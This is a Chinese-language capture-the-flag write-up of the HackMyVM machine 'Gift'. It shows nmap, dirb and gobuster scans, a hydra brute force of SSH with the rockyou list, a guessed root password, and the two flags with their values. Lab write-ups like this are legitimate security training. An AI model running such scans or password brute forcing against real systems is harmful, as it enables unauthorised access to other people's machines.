Gift
扫描一下,正常,开淦!
信息搜集
端口扫描
sudo nmap -p- -Pn -sS 10.161.61.135
刚做完Azer
,有点一朝被蛇咬,十年怕井绳的感觉,哈哈哈。。
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-15 13:18 EDT
Nmap scan report for 10.161.61.135
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:F1:BD:13 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
目录扫描
dirb http://10.161.61.135
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Mar 15 13:19:53 2024
URL_BASE: http://10.161.61.135/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.161.61.135/ ----
+ http://10.161.61.135/index.html (CODE:200|SIZE:57)
-----------------
END_TIME: Fri Mar 15 13:19:56 2024
DOWNLOADED: 4612 - FOUND: 1
结果并不令人满意,换一个试试。
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.161.61.135 -f -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.161.61.135
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================
获取flag
怪不得叫Gift,打开页面以后发现:
查看源代码:
Dont Overthink. Really, Its simple.
<!-- Trust me -->
查看敏感目录,一无所获。
无脑一波,尝试rockyou
字典爆破ssh:
sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://10.161.61.135
爆破过程中手动连接一下ssh,随便尝试一些简单密码:
Trust me
Dont Overthink. Really, Its simple.
simple
结果进去了。。。。。还没爆破完呢。
┌──(kali㉿kali)-[~/temp]
└─$ ssh root@10.161.61.135
The authenticity of host '10.161.61.135 (10.161.61.135)' can't be established.
ED25519 key fingerprint is SHA256:dXsAE5SaInFUaPinoxhcuNloPhb2/x2JhoGVdcF8Y6I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.161.61.135' (ED25519) to the list of known hosts.
root@10.161.61.135's password:
Permission denied, please try again.
root@10.161.61.135's password:
Permission denied, please try again.
root@10.161.61.135's password:
IM AN SSH SERVER
gift:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
gift:~# ls -la
total 20
drwx------ 2 root root 4096 Sep 24 2020 .
drwxr-xr-x 22 root root 4096 Sep 18 2020 ..
-rw------- 1 root root 26 Mar 15 17:33 .ash_history
---------- 1 root root 12 Sep 24 2020 root.txt
-rw-rw---- 1 root root 12 Sep 24 2020 user.txt
gift:~# cat root.txt
HMVtyr543FG
gift:~# cat user.txt
HMV665sXzDS
后来爆破结果出来了:
┌──(kali㉿kali)-[~]
└─$ sudo hydra -l root -P /usr/share/wordlists/rockyou.txt -F ssh://10.161.61.135
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-03-15 13:29:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.161.61.135:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 13 active
[22][ssh] host: 10.161.61.135 login: root password: simple
[STATUS] attack finished for 10.161.61.135 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-03-15 13:32:09
记录一下吧,真好!